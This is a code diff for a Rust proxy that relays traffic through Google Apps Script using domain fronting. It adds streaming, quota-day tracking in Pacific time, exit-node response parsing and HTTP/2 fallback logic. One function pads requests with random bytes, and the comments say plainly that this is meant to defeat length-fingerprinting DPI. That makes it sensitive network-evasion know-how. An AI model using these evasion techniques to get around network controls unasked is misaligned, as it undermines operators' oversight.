+                writer.write_all(&c).await?;
+                body_bytes_emitted = body_bytes_emitted.saturating_add(c.len() as u64);
+                if body_bytes_emitted >= next_progress_log_at {
+                    // Percentage is well-defined here: streaming
+                    // branch is only reached for total >
+                    // APPS_SCRIPT_BODY_MAX_BYTES (≥ 40 MiB), so the
+                    // divisor is never zero.
+                    let pct = (body_bytes_emitted * 100) / total;
+                    tracing::info!(
+                        "range-parallel-stream: {}/{} MiB ({}%) emitted for {}",
+                        body_bytes_emitted / (1024 * 1024),
+                        total / (1024 * 1024),
+                        pct,
+                        url_for_log,
+                    );
+                    // Advance to the next interval past the current
+                    // count — a chunk much larger than the interval
+                    // (shouldn't happen at 256 KiB chunks, but defend
+                    // against future tuning) skips intermediate
+                    // thresholds rather than firing N log lines back
+                    // to back.
+                    next_progress_log_at = body_bytes_emitted
+                        .saturating_add(STREAM_PROGRESS_LOG_INTERVAL_BYTES);
+                }
+            }
+            Err(reason) => {
+                tracing::warn!(
+                    "range-parallel-stream: invalid chunk {}-{} for {} ({}); truncating response",
+                    s, e, url_for_log, reason,
+                );
+                // Flush the committed prefix to the wire before
+                // declaring failure — see function doc. We
+                // deliberately ignore a flush failure here: if the
+                // socket is already broken the original
+                // chunk-validation error is still the more useful
+                // diagnosis for the caller.
+                let _ = writer.flush().await;
+                return Err(std::io::Error::other(format!(
+                    "range-parallel-stream chunk failure: {}",
+                    reason
+                )));
+            }
+        }
+    }
+    Ok(())
+}
+
+/// Glue between probe response + chunk stream + writer. Composes
+/// `assemble_200_head` (builds a synthetic 200 with
+/// `Content-Length: total`), the caller's head-transform closure
+/// (e.g. CORS injection), and `stream_chunks_to_writer` (writes the
+/// transformed head, the probe body, then each chunk in order).
+///
+/// Extracted as a free function so the streaming-branch wiring in
+/// `do_relay_parallel_range_to` is unit-testable without a live
+/// `DomainFronter`. A test can feed a synthetic probe-header set, a
+/// probe body, and a `stream::iter(…)` of canned chunk results, then
+/// inspect the bytes written to a `Vec<u8>` to assert the right
+/// composition (head → probe → chunks in order, transform_head
+/// applied to the head only, mid-stream Err propagation with the
+/// committed prefix intact).
+async fn stream_range_response_to<W, S, F>(
+    writer: &mut W,
+    probe_resp_headers: &[(String, String)],
+    probe_body: &[u8],
+    total: u64,
+    chunks_stream: S,
+    transform_head: &F,
+    url_for_log: &str,
+) -> std::io::Result<()>
+where
+    W: tokio::io::AsyncWrite + Unpin,
+    S: futures_util::Stream<Item = (u64, u64, Result<Vec<u8>, &'static str>)>,
+    F: Fn(&[u8]) -> Vec<u8>,
+{
+    let head = assemble_200_head(probe_resp_headers, total);
+    let head = transform_head(&head);
+    stream_chunks_to_writer(writer, &head, probe_body, total, chunks_stream, url_for_log).await
+}
+
+/// Tiny adapter that lets `relay_parallel_range_to` write into a
+/// `Vec<u8>` so the backward-compat `relay_parallel_range` wrapper
+/// can stay on the writer-based code path. `Vec<u8>` itself doesn't
+/// implement `tokio::io::AsyncWrite`; this just extends in-place,
+/// never fails, and never needs to block — `poll_*` immediately
+/// returns `Ready`.
+struct VecAsyncWriter<'a>(&'a mut Vec<u8>);
+
+impl tokio::io::AsyncWrite for VecAsyncWriter<'_> {
+    fn poll_write(
+        self: std::pin::Pin<&mut Self>,
+        _: &mut std::task::Context<'_>,
+        buf: &[u8],
+    ) -> std::task::Poll<std::io::Result<usize>> {
+        self.get_mut().0.extend_from_slice(buf);
+        std::task::Poll::Ready(Ok(buf.len()))
+    }
+
+    fn poll_flush(
+        self: std::pin::Pin<&mut Self>,
+        _: &mut std::task::Context<'_>,
+    ) -> std::task::Poll<std::io::Result<()>> {
+        std::task::Poll::Ready(Ok(()))
+    }
+
+    fn poll_shutdown(
+        self: std::pin::Pin<&mut Self>,
+        _: &mut std::task::Context<'_>,
+    ) -> std::task::Poll<std::io::Result<()>> {
+        std::task::Poll::Ready(Ok(()))
+    }
+}
+
 fn normalize_x_graphql_url(url: &str) -> String {
     // Split host from the rest. We accept both "x.com" and common legacy
     // forms; the Python patch only checks x.com so we do the same to be
@@ -1509,30 +3798,74 @@ fn normalize_x_graphql_url(url: &str) -> String {
     format!("{}{}{}?{}", scheme, host, path, new_query)
 }
 
-/// "YYYY-MM-DD" of the current UTC date. Used as the daily-reset
-/// boundary for `today_calls` / `today_bytes`. We format manually so
-/// this stays std-only and doesn't pull `time` or `chrono` for a
-/// ~20-line helper.
-fn current_utc_day_key() -> String {
+/// Maximum bytes of random padding appended to outbound Apps Script
+/// JSON request bodies. Picked so the per-request padding distribution
+/// (uniformly 0..MAX) shifts the body length enough to defeat naive
+/// length-fingerprint DPI without bloating bandwidth — at the average
+/// 512-byte add, on a typical 2 KB tunnel batch this is +25%, which is
+/// negligible compared to Apps Script's per-call latency floor anyway.
+/// (Issue #313, #365 Section 1 — DPI evasion.)
+const MAX_RANDOM_PAD_BYTES: usize = 1024;
+
+/// Insert a `_pad` field of random length (0..MAX_RANDOM_PAD_BYTES)
+/// into a request payload before serialization. Server-side ignores
+/// unknown JSON fields, so this is fully backward-compatible with old
+/// `Code.gs` / `CodeFull.gs` deployments — the pad is just along for
+/// the ride.
+///
+/// Random bytes are base64-encoded (NO inner JSON-escape worries) and
+/// the pad LENGTH itself is uniformly distributed, so packet sizes
+/// land all over the place rather than clustering at a few discrete
+/// peaks. That's the property DPI's length-distribution clustering
+/// fingerprints can't match.
+fn add_random_pad(map: &mut serde_json::Map<String, Value>) {
+    let mut rng = thread_rng();
+    let len = rng.gen_range(0..=MAX_RANDOM_PAD_BYTES);
+    if len == 0 {
+        // Skip the field entirely sometimes — adds another bit of
+        // distribution variance (presence-vs-absence of `_pad` itself).
+        return;
+    }
+    let mut buf = vec![0u8; len];
+    rng.fill_bytes(&mut buf);
+    map.insert("_pad".into(), Value::String(B64.encode(&buf)));
+}
+
+/// "YYYY-MM-DD" of the current Pacific Time date. Used as the daily-reset
+/// boundary for `today_calls` / `today_bytes` because **Apps Script's
+/// quota counter resets at midnight Pacific Time, not UTC** — that's
+/// where Google's quota bookkeeping lives. We format manually so this
+/// stays std-only and doesn't pull `time-tz` or `chrono` plus a ~3 MB
+/// IANA tzdb just for one ~50-line helper. (Issue #230, #362.)
+///
+/// PT offset depends on DST: PST = UTC-8, PDT = UTC-7. We use the
+/// stable US DST rule (2nd Sunday of March 02:00 → 1st Sunday of
+/// November 02:00 = PDT, otherwise PST). The hour-of-day boundary on
+/// transition days is approximated; this drifts by up to 1h for at
+/// most 2h/year on the spring-forward / fall-back transitions, which
+/// is fine for a daily countdown.
+fn current_pt_day_key() -> String {
     let secs = std::time::SystemTime::now()
         .duration_since(std::time::UNIX_EPOCH)
         .map(|d| d.as_secs())
         .unwrap_or(0);
-    let (y, m, d) = unix_to_ymd_utc(secs);
+    let pt_secs = unix_to_pt_seconds(secs);
+    let (y, m, d) = unix_to_ymd_utc(pt_secs);
     format!("{:04}-{:02}-{:02}", y, m, d)
 }
 
-/// Seconds until the next 00:00 UTC. Used by the UI to render a
-/// "resets in Xh Ym" countdown without the UI having to import time
-/// libraries. Conservative: if the system clock is broken we return
-/// 0 instead of a huge negative-looking number.
-fn seconds_until_utc_midnight() -> u64 {
+/// Seconds until the next 00:00 Pacific Time. Used by the UI to render
+/// a "resets in Xh Ym" countdown matching Apps Script's actual quota
+/// reset cadence (#230, #362). Conservative: if the system clock is
+/// broken we return 0 instead of a huge negative-looking number.
+fn seconds_until_pacific_midnight() -> u64 {
     let secs = std::time::SystemTime::now()
         .duration_since(std::time::UNIX_EPOCH)
         .map(|d| d.as_secs())
         .unwrap_or(0);
+    let pt_secs = unix_to_pt_seconds(secs);
     let day = 86_400u64;
-    let rem = secs % day;
+    let rem = pt_secs % day;
     if rem == 0 {
         day
     } else {
@@ -1540,6 +3873,65 @@ fn seconds_until_utc_midnight() -> u64 {
     }
 }
 
+/// Convert Unix UTC seconds to "Pacific Time as if it were UTC" seconds,
+/// i.e. add the PT-from-UTC offset (negative for the western hemisphere
+/// becomes a subtraction). Result is suitable for feeding into
+/// `unix_to_ymd_utc` to extract the PT calendar date, or for `% 86_400`
+/// to find PT seconds-into-day.
+fn unix_to_pt_seconds(utc_secs: u64) -> u64 {
+    // First-pass guess at PT date using PST (-8) — used to determine
+    // whether DST is currently in effect, which then settles the actual
+    // offset. The two-pass approach avoids the chicken-and-egg of
+    // "I need the PT date to know if it's DST, but I need the offset
+    // to compute the PT date." A 1-hour fudge in the guess is harmless
+    // because DST never starts within the first hour after midnight
+    // PST or ends within the first hour after midnight PDT.
+    let pst_guess = utc_secs.saturating_sub(8 * 3600);
+    let (y, m, d) = unix_to_ymd_utc(pst_guess);
+    let offset_secs = if pacific_is_dst(y, m, d) {
+        7 * 3600
+    } else {
+        8 * 3600
+    };
+    utc_secs.saturating_sub(offset_secs)
+}
+
+/// Whether Pacific Time is observing daylight saving on the given
+/// calendar date (year, month=1..12, day=1..31). US DST window:
+/// 2nd Sunday of March through 1st Sunday of November. The transition
+/// hour itself (02:00 local) is approximated to whole-day boundaries —
+/// good enough for a daily-quota countdown.
+fn pacific_is_dst(year: i64, month: u32, day: u32) -> bool {
+    if month < 3 || month > 11 {
+        return false;
+    }
+    if month > 3 && month < 11 {
+        return true;
+    }
+    if month == 3 {
+        let dst_start = nth_sunday_of_month(year, 3, 2);
+        day >= dst_start
+    } else {
+        // month == 11
+        let dst_end = nth_sunday_of_month(year, 11, 1);
+        day < dst_end
+    }
+}
+
+/// Day-of-month for the Nth Sunday (1-indexed) of (year, month). Uses
+/// Sakamoto's method for the month's-1st day-of-week, then offsets to
+/// the desired Sunday. Pure arithmetic, no calendar tables.
+fn nth_sunday_of_month(year: i64, month: u32, nth: u32) -> u32 {
+    // Sakamoto's day-of-week. 0 = Sunday.
+    static T: [i64; 12] = [0, 3, 2, 5, 0, 3, 5, 1, 4, 6, 2, 4];
+    let y = if month < 3 { year - 1 } else { year };
+    let m = month as i64;
+    let dow_of_1st =
+        ((y + y / 4 - y / 100 + y / 400 + T[(m - 1) as usize] + 1).rem_euclid(7)) as u32;
+    let first_sunday = if dow_of_1st == 0 { 1 } else { 8 - dow_of_1st };
+    first_sunday + (nth - 1) * 7
+}
+
 /// Convert a Unix timestamp (seconds since 1970-01-01 UTC) to a
 /// (year, month, day) tuple, UTC. Standalone so we can stay
 /// std-only — no chrono/time/jiff dependency pulled for one caller.
@@ -1563,6 +3955,117 @@ fn unix_to_ymd_utc(secs: u64) -> (i64, u32, u32) {
     (y, m as u32, d as u32)
 }
 
+/// Parse the exit-node JSON envelope back into a raw HTTP/1.1
+/// response. The envelope shape is:
+///
+/// - On success: `{ "s": <status u16>, "h": { ... }, "b": "<base64>" }`
+/// - On exit-node-side error: `{ "e": "<message>" }` with HTTP 4xx/5xx
+///   from exit-node's own status code (decoded from the outer Apps Script
+///   layer, not the inner field).
+///
+/// We synthesize a complete HTTP/1.1 response from these fields so the
+/// MITM TLS write-back path sees the same shape it gets from the regular
+/// Apps Script relay (status line + headers + body).
+fn parse_exit_node_response(body: &[u8]) -> Result<Vec<u8>, FronterError> {
+    let v: Value = serde_json::from_slice(body).map_err(|e| {
+        FronterError::Relay(format!(
+            "exit-node response not valid JSON ({}): {}",
+            e,
+            String::from_utf8_lossy(&body[..body.len().min(200)])
+        ))
+    })?;
+
+    // Surface exit-node's internal errors clearly rather than as a 502
+    // from the outer envelope. The `{e: "..."}` shape is what the exit-node's
+    // script emits on bad PSK, malformed URL, or any caught exception.
+    if let Some(err_msg) = v.get("e").and_then(|x| x.as_str()) {
+        return Err(FronterError::Relay(format!(
+            "exit node refused or errored: {}",
+            err_msg
+        )));
+    }
+
+    let status = v
+        .get("s")
+        .and_then(|x| x.as_u64())
+        .map(|n| n as u16)
+        .unwrap_or(502);
+    let body_b64 = v.get("b").and_then(|x| x.as_str()).unwrap_or("");
+    let body_bytes = if body_b64.is_empty() {
+        Vec::new()
+    } else {
+        B64.decode(body_b64).map_err(|e| {
+            FronterError::Relay(format!("exit-node body base64 decode failed: {}", e))
+        })?
+    };
+
+    // Reconstruct headers. Skip hop-by-hop / would-double-up headers
+    // (Content-Length comes from our own length count below; the outer
+    // Apps Script transport already handled Transfer-Encoding/chunked).
+    const SKIP_RESPONSE_HEADERS: &[&str] = &[
+        "content-length",
+        "transfer-encoding",
+        "connection",
+        "keep-alive",
+    ];
+
+    let mut out = Vec::with_capacity(body_bytes.len() + 256);
+    let _ = std::io::Write::write_fmt(
+        &mut out,
+        format_args!("HTTP/1.1 {} {}\r\n", status, status_reason(status)),
+    );
+    if let Some(headers_obj) = v.get("h").and_then(|x| x.as_object()) {
+        for (k, v_val) in headers_obj {
+            let lc = k.to_ascii_lowercase();
+            if SKIP_RESPONSE_HEADERS.contains(&lc.as_str()) {
+                continue;
+            }
+            if let Some(val_str) = v_val.as_str() {
+                let _ = std::io::Write::write_fmt(
+                    &mut out,
+                    format_args!("{}: {}\r\n", k, val_str),
+                );
+            }
+        }
+    }
+    let _ = std::io::Write::write_fmt(
+        &mut out,
+        format_args!("Content-Length: {}\r\n\r\n", body_bytes.len()),
+    );
+    out.extend_from_slice(&body_bytes);
+    Ok(out)
+}
+
+/// Minimal HTTP status reason-phrase table for synthesizing status
+/// lines in `parse_exit_node_response`. Browsers don't actually parse
+/// the reason phrase (only the status code matters), but a recognizable
+/// string makes log lines readable.
+fn status_reason(status: u16) -> &'static str {
+    match status {
+        200 => "OK",
+        201 => "Created",
+        204 => "No Content",
+        301 => "Moved Permanently",
+        302 => "Found",
+        303 => "See Other",
+        304 => "Not Modified",
+        307 => "Temporary Redirect",
+        308 => "Permanent Redirect",
+        400 => "Bad Request",
+        401 => "Unauthorized",
+        403 => "Forbidden",
+        404 => "Not Found",
+        405 => "Method Not Allowed",
+        408 => "Request Timeout",
+        429 => "Too Many Requests",
+        500 => "Internal Server Error",
+        502 => "Bad Gateway",
+        503 => "Service Unavailable",
+        504 => "Gateway Timeout",
+        _ => "Status",
+    }
+}
+
 fn extract_host(url: &str) -> Option<String> {
     let after_scheme = url.split_once("://").map(|(_, rest)| rest).unwrap_or(url);
     let authority = after_scheme.split('/').next().unwrap_or("");
@@ -1754,14 +4257,50 @@ fn parse_redirect(location: &str) -> (String, Option<String>) {
 
 /// Read a single HTTP/1.1 response from the stream. Keep-alive safe: respects
 /// Content-Length or chunked transfer-encoding.
+///
+/// Uses a 10 s *total* header-read deadline — the historical 10 s value
+/// preserved for most callers (relay path, exit-node, etc.). Note the
+/// semantics changed in this patch: the underlying loop now treats this
+/// as an absolute deadline across all header reads, not a per-read budget
+/// that would silently extend on drip-feed. The tunnel batch path overrides
+/// the 10 s value via `read_http_response_with_header_timeout`, since the
+/// configurable `request_timeout_secs` (default 30 s) is the authoritative
+/// cliff there.
 async fn read_http_response<S>(stream: &mut S) -> Result<(u16, Vec<(String, String)>, Vec<u8>), FronterError>
+where
+    S: tokio::io::AsyncRead + Unpin,
+{
+    read_http_response_with_header_timeout(stream, Duration::from_secs(10)).await
+}
+
+/// `read_http_response` with a caller-supplied header-read timeout. The
+/// timeout applies only to the *initial* header-block read; the body-read
+/// timeouts in this function are deliberately left at their fixed values
+/// because once the response has started flowing, per-chunk stalls are a
+/// separate signal from "Apps Script hasn't started writing yet."
+///
+/// The tunnel batch path passes `DomainFronter::batch_timeout()` so that
+/// `Config::request_timeout_secs` is the *only* knob controlling how long
+/// we wait for an Apps Script edge to start responding — the hardcoded 10 s
+/// inner cliff was firing well before the outer `batch_timeout` in
+/// `tunnel_client::fire_batch` could, masquerading as a 10 s "batch
+/// timeout" in user logs (issue #1088).
+async fn read_http_response_with_header_timeout<S>(
+    stream: &mut S,
+    header_read_timeout: Duration,
+) -> Result<(u16, Vec<(String, String)>, Vec<u8>), FronterError>
 where
     S: tokio::io::AsyncRead + Unpin,
 {
     let mut buf = Vec::with_capacity(8192);
     let mut tmp = [0u8; 8192];
+    // One deadline for the whole header read, not per-iteration. Otherwise
+    // a slow peer drip-feeding one byte just under `header_read_timeout`
+    // keeps this loop alive forever and defeats the outer `batch_timeout`
+    // wiring (the entire point of #1088's fix).
+    let deadline = tokio::time::Instant::now() + header_read_timeout;
     let header_end = loop {
-        let n = timeout(Duration::from_secs(10), stream.read(&mut tmp)).await
+        let n = tokio::time::timeout_at(deadline, stream.read(&mut tmp)).await
             .map_err(|_| FronterError::Timeout)??;
         if n == 0 {
             return Err(FronterError::BadResponse("connection closed before headers".into()));
@@ -1801,8 +4340,27 @@ where
         while body.len() < cl {
             let need = cl - body.len();
             let want = need.min(tmp.len());
-            let n = timeout(Duration::from_secs(20), stream.read(&mut tmp[..want])).await
-                .map_err(|_| FronterError::Timeout)??;
+            // Handle ungraceful TLS close-without-close_notify (rustls
+            // surfaces this as `io::ErrorKind::UnexpectedEof`). Some
+            // origins — notably exit-node path through Apps
+            // Script (#585, v1.9.4) and certain Apps Script `Connection:
+            // close` responses — terminate the underlying TCP without
+            // sending the TLS close_notify alert first. Treat that the
+            // same as a clean `n == 0`: if we already have the full body
+            // declared by Content-Length, the response *is* complete.
+            // Only propagate the error if Content-Length couldn't be
+            // satisfied (real truncation, not a polite-protocol violation).
+            let read_res = timeout(
+                Duration::from_secs(20),
+                stream.read(&mut tmp[..want]),
+            )
+            .await
+            .map_err(|_| FronterError::Timeout)?;
+            let n = match read_res {
+                Ok(n) => n,
+                Err(e) if e.kind() == std::io::ErrorKind::UnexpectedEof => 0,
+                Err(e) => return Err(e.into()),
+            };
             if n == 0 {
                 return Err(FronterError::BadResponse(
                     "connection closed before full response body".into(),
@@ -1811,11 +4369,17 @@ where
             body.extend_from_slice(&tmp[..n]);
         }
     } else {
-        // No framing — read until short timeout.
+        // No framing — read until short timeout, EOF, or ungraceful
+        // TLS close (UnexpectedEof). Each is treated as "we got what
+        // the peer wanted to send"; the response we already have is
+        // returned to the caller. UnexpectedEof here is the most common
+        // case for `Connection: close` responses from servers that
+        // don't bother with TLS close_notify (#585).
         loop {
             match timeout(Duration::from_secs(2), stream.read(&mut tmp)).await {
                 Ok(Ok(0)) => break,
                 Ok(Ok(n)) => body.extend_from_slice(&tmp[..n]),
+                Ok(Err(e)) if e.kind() == std::io::ErrorKind::UnexpectedEof => break,
                 Ok(Err(e)) => return Err(e.into()),
                 Err(_) => break,
             }
@@ -1861,8 +4425,18 @@ where
             }
         }
         while buf.len() < size + 2 {
-            let n = timeout(Duration::from_secs(20), stream.read(&mut tmp)).await
-                .map_err(|_| FronterError::Timeout)??;
+            // UnexpectedEof tolerance — see read_http_response for
+            // rationale. Treated as `n == 0`; if we haven't accumulated
+            // the full chunk yet, that's still a real truncation and
+            // we return BadResponse below.
+            let read_res = timeout(Duration::from_secs(20), stream.read(&mut tmp))
+                .await
+                .map_err(|_| FronterError::Timeout)?;
+            let n = match read_res {
+                Ok(n) => n,
+                Err(e) if e.kind() == std::io::ErrorKind::UnexpectedEof => 0,
+                Err(e) => return Err(e.into()),
+            };
             if n == 0 {
                 return Err(FronterError::BadResponse(
                     "connection closed mid-chunked response".into(),
@@ -1926,6 +4500,44 @@ fn parse_status_line(line: &str) -> Result<u16, FronterError> {
     code.parse::<u16>().map_err(|_| FronterError::BadResponse(format!("bad status code: {}", code)))
 }
 
+/// Returns `true` if the HTTP method is safe to fan-out across multiple
+/// Apps Script deployments (i.e. idempotent per RFC 9110 §9.2.2). Used
+/// by `do_relay_with_retry` to gate the `parallel_relay` fan-out so that
+/// non-idempotent operations (POST / PUT / PATCH / DELETE) don't double-
+/// fire at the destination — Apps Script `UrlFetchApp.fetch()` can't be
+/// cancelled mid-request from our side, so every parallel attempt
+/// completes server-side even when our `select_ok` already returned a
+/// winner. See #743 for the user-visible bug (duplicate POSTs).
+fn is_method_safe_for_fanout(method: &str) -> bool {
+    matches!(method.to_ascii_uppercase().as_str(), "GET" | "HEAD" | "OPTIONS")
+}
+
+/// Recognize HTTP statuses from the h2 path that mean "this edge
+/// won't accept your fronted h2 request, but might accept the same
+/// request over h1." Used to trigger an automatic sticky-disable of
+/// the h2 fast path + h1 fallback.
+///
+/// 421 (Misdirected Request) is the spec signal: per RFC 7540
+/// §9.1.2, the server returns it when the connection's authority is
+/// not appropriate for the request URI. With domain fronting that
+/// means the edge enforced "TLS SNI must match :authority" — true
+/// on h2 (the server sees both pseudo-headers in cleartext) but
+/// historically lenient on h1 (the encrypted Host header is what
+/// the bypass relies on). Treating 421 as h2-fallback rather than
+/// "Apps Script error" prevents h2 default-on from breaking
+/// previously-working h1 deployments.
+///
+/// Other edge-level rejects (403, etc.) are ambiguous — could be a
+/// real Apps Script geoblock or a real upstream — so we don't
+/// blanket-treat them.
+///
+/// The h2 layer treats this as a "request not sent upstream"
+/// outcome (the edge rejected before forwarding to Apps Script),
+/// so falling back to h1 is safe with no duplication risk.
+fn is_h2_fronting_refusal_status(status: u16) -> bool {
+    status == 421
+}
+
 /// Parse the JSON envelope from Apps Script and build a raw HTTP response.
 fn parse_relay_json(body: &[u8]) -> Result<Vec<u8>, FronterError> {
     let text = std::str::from_utf8(body)
@@ -1938,14 +4550,38 @@ fn parse_relay_json(body: &[u8]) -> Result<Vec<u8>, FronterError> {
     let data: RelayResponse = match serde_json::from_str(text) {
         Ok(v) => v,
         Err(_) => {
-            // Apps Script may prepend HTML fallback; try to extract first {...}
-            let start = text.find('{').ok_or_else(|| {
-                FronterError::BadResponse(format!("no json in: {}", &text[..text.len().min(200)]))
-            })?;
-            let end = text.rfind('}').ok_or_else(|| {
-                FronterError::BadResponse(format!("no json end in: {}", &text[..text.len().min(200)]))
-            })?;
-            serde_json::from_str(&text[start..=end])?
+            // Some deployments (legacy Code.gs that used HtmlService for
+            // _json, or our own doGet hit accidentally via a redirect
+            // chain) wrap the JSON inside the goog.script sandbox iframe
+            // as `goog.script.init("\x7b...userHtml...\x7d", "", undefined)`.
+            // Try that unwrap first — if it succeeds, the inner userHtml
+            // *is* our JSON. Mirrors upstream's Python client extractor.
+            if let Some(unwrapped) = extract_apps_script_user_html(text) {
+                if let Ok(v) = serde_json::from_str(&unwrapped) {
+                    v
+                } else {
+                    return Err(FronterError::BadResponse(format!(
+                        "no json in apps_script user_html: {}",
+                        &unwrapped[..unwrapped.len().min(200)]
+                    )));
+                }
+            } else {
+                // Last resort: extract first { ... last }, in case Apps
+                // Script prepended HTML preamble before the raw JSON.
+                let start = text.find('{').ok_or_else(|| {
+                    FronterError::BadResponse(format!(
+                        "no json in: {}",
+                        &text[..text.len().min(200)]
+                    ))
+                })?;
+                let end = text.rfind('}').ok_or_else(|| {
+                    FronterError::BadResponse(format!(
+                        "no json end in: {}",
+                        &text[..text.len().min(200)]
+                    ))
+                })?;
+                serde_json::from_str(&text[start..=end])?
+            }
         }
     };
 
@@ -2001,6 +4637,98 @@ fn parse_relay_json(body: &[u8]) -> Result<Vec<u8>, FronterError> {
     Ok(out)
 }
 
+/// Unwrap the `goog.script.init` sandbox iframe that wraps every
+/// HtmlService web-app response. The wrapper text looks roughly like:
+///
+/// ```text
+/// <html>...
+/// goog.script.init("\x7b\x22userHtml\x22:\x22{...}\x22,...\x7d", "", undefined);
+/// ...
+/// ```
+///
+/// where the first parameter is a JSON string (with `\xNN` byte-escapes
+/// for `{`, `"`, etc.) whose `userHtml` field carries our actual JSON
+/// body. We find the marker, decode the byte-escapes, parse the outer
+/// JSON, and return `userHtml`. Returns `None` if any step doesn't
+/// match — the caller falls back to the brace-scan path.
+///
+/// Mirrors `_extract_apps_script_user_html` in upstream Python client.
+fn extract_apps_script_user_html(text: &str) -> Option<String> {
+    let marker = "goog.script.init(\"";
+    let start_idx = text.find(marker)? + marker.len();
+    // The marker is closed by `", "", undefined` (Apps Script always
+    // emits this exact literal — there are two more positional args after
+    // the JSON string, both empty / undefined).
+    let end_marker = "\", \"\", undefined";
+    let end_idx = text[start_idx..].find(end_marker)? + start_idx;
+    let encoded = &text[start_idx..end_idx];
+
+    // Decode `\xNN` and `\u00NN` byte-escapes that Apps Script uses to
+    // protect `{`, `"`, `\`, etc. inside the JS string literal.
+    let decoded = decode_js_string_escapes(encoded)?;
+
+    // Outer JSON — typically `{"userHtml":"<our JSON>", ...}`.
+    let outer: Value = serde_json::from_str(&decoded).ok()?;
+    let user_html = outer.get("userHtml")?.as_str()?;
+    Some(user_html.to_string())
+}
+
+/// Minimal JS string-literal escape decoder for `\xNN`, `\uNNNN`, and
+/// the standard backslash forms (`\\`, `\"`, `\n`, `\r`, `\t`, `\/`).
+/// Used to unwrap the `goog.script.init("...")` parameter — Apps Script
+/// emits ASCII-only `\xNN` for every non-alphanumeric byte, so the
+/// decoder doesn't need to handle full Unicode surrogates.
+fn decode_js_string_escapes(s: &str) -> Option<String> {
+    let mut out = String::with_capacity(s.len());
+    let bytes = s.as_bytes();
+    let mut i = 0;
+    while i < bytes.len() {
+        let c = bytes[i];
+        if c != b'\\' {
+            // Fast path: copy ASCII / valid UTF-8 byte through.
+            out.push(c as char);
+            i += 1;
+            continue;
+        }
+        if i + 1 >= bytes.len() {
+            return None;
+        }
+        let esc = bytes[i + 1];
+        match esc {
+            b'x' => {
+                if i + 3 >= bytes.len() {
+                    return None;
+                }
+                let hex = std::str::from_utf8(&bytes[i + 2..i + 4]).ok()?;
+                let v = u8::from_str_radix(hex, 16).ok()?;
+                out.push(v as char);
+                i += 4;
+            }
+            b'u' => {
+                if i + 5 >= bytes.len() {
+                    return None;
+                }
+                let hex = std::str::from_utf8(&bytes[i + 2..i + 6]).ok()?;
+                let v = u32::from_str_radix(hex, 16).ok()?;
+                let ch = char::from_u32(v)?;
+                out.push(ch);
+                i += 6;
+            }
+            b'\\' => { out.push('\\'); i += 2; }
+            b'"' => { out.push('"'); i += 2; }
+            b'\'' => { out.push('\''); i += 2; }
+            b'/' => { out.push('/'); i += 2; }
+            b'n' => { out.push('\n'); i += 2; }
+            b'r' => { out.push('\r'); i += 2; }
+            b't' => { out.push('\t'); i += 2; }
+            b'b' => { out.push('\x08'); i += 2; }
+            b'f' => { out.push('\x0c'); i += 2; }
+            _ => return None,
+        }
+    }
+    Some(out)
+}
+
 #[derive(Debug, Clone)]
 pub struct StatsSnapshot {
     pub relay_calls: u64,
@@ -2012,17 +4740,36 @@ pub struct StatsSnapshot {
     pub cache_bytes: usize,
     pub blacklisted_scripts: usize,
     pub total_scripts: usize,
-    /// Relay calls attributed to the current UTC day. Resets at 00:00 UTC.
-    /// This is what-this-process-has-done today, not the Google-side bucket.
+    /// Relay calls attributed to the current Pacific Time day. Resets
+    /// at 00:00 PT (midnight Pacific) — matches Apps Script's actual
+    /// quota reset cadence (#230, #362). This is what-this-process-
+    /// has-done today, not the Google-side bucket.
     pub today_calls: u64,
-    /// Response bytes from relay calls attributed to the current UTC day.
+    /// Response bytes from relay calls attributed to the current PT day.
     pub today_bytes: u64,
-    /// "YYYY-MM-DD" of the day `today_calls` / `today_bytes` refer to.
-    /// Useful for cross-referencing against Google's dashboard.
+    /// "YYYY-MM-DD" of the PT day `today_calls` / `today_bytes` refer
+    /// to. Useful for cross-referencing against Google's dashboard,
+    /// which is also PT-aligned.
     pub today_key: String,
-    /// Seconds until the next 00:00 UTC rollover. Convenient for the UI
+    /// Seconds until the next 00:00 PT rollover. Convenient for the UI
     /// to render "Resets in Xh Ym" without importing time libraries.
     pub today_reset_secs: u64,
+    /// Calls served by the HTTP/2 multiplexed transport, across all
+    /// entry points (Apps-Script direct, exit-node outer call,
+    /// full-mode tunnel single op, full-mode tunnel batch).
+    ///
+    /// Not comparable to `relay_calls` — that counter only sees the
+    /// Apps-Script-direct path. To gauge h2 health, compute
+    /// `h2_calls / (h2_calls + h2_fallbacks)`.
+    pub h2_calls: u64,
+    /// Calls that attempted h2 but had to fall back to h1 (per-call
+    /// failures, open timeout, backoff, sticky ALPN refusal). Same
+    /// all-entry-points scope as `h2_calls`.
+    pub h2_fallbacks: u64,
+    /// True when h2 is permanently off for this fronter (config kill
+    /// switch set, or peer refused h2 during ALPN). All traffic on the
+    /// h1 path.
+    pub h2_disabled: bool,
 }
 
 impl StatsSnapshot {
@@ -2036,8 +4783,27 @@ impl StatsSnapshot {
     }
 
     pub fn fmt_line(&self) -> String {
+        // h2 segment is the success ratio across all transports
+        // (h2_calls + h2_fallbacks). Showing "X/Y" against relay_calls
+        // would mislead — relay_calls only counts the Apps-Script
+        // direct path, while h2_calls also includes exit-node and
+        // tunnel paths that bypass relay_uncoalesced.
+        let h2_seg = if self.h2_disabled {
+            " h2=off".to_string()
+        } else {
+            let total = self.h2_calls + self.h2_fallbacks;
+            if total == 0 {
+                String::new()
+            } else {
+                let pct = (self.h2_calls as f64 / total as f64) * 100.0;
+                format!(
+                    " h2-success={}/{} ({:.0}%)",
+                    self.h2_calls, total, pct
+                )
+            }
+        };
         format!(
-            "stats: relay={} ({}KB) failures={} coalesced={} cache={}/{} ({:.0}% hit, {}KB) scripts={}/{} active",
+            "stats: relay={} ({}KB) failures={} coalesced={} cache={}/{} ({:.0}% hit, {}KB) scripts={}/{} active{}",
             self.relay_calls,
             self.bytes_relayed / 1024,
             self.relay_failures,
@@ -2048,6 +4814,7 @@ impl StatsSnapshot {
             self.cache_bytes / 1024,
             self.total_scripts - self.blacklisted_scripts,
             self.total_scripts,
+            h2_seg,
         )
     }
 
@@ -2060,7 +4827,7 @@ impl StatsSnapshot {
             s.replace('\\', "\\\\").replace('"', "\\\"")
         }
         format!(
-            r#"{{"relay_calls":{},"relay_failures":{},"coalesced":{},"bytes_relayed":{},"cache_hits":{},"cache_misses":{},"cache_bytes":{},"blacklisted_scripts":{},"total_scripts":{},"today_calls":{},"today_bytes":{},"today_key":"{}","today_reset_secs":{}}}"#,
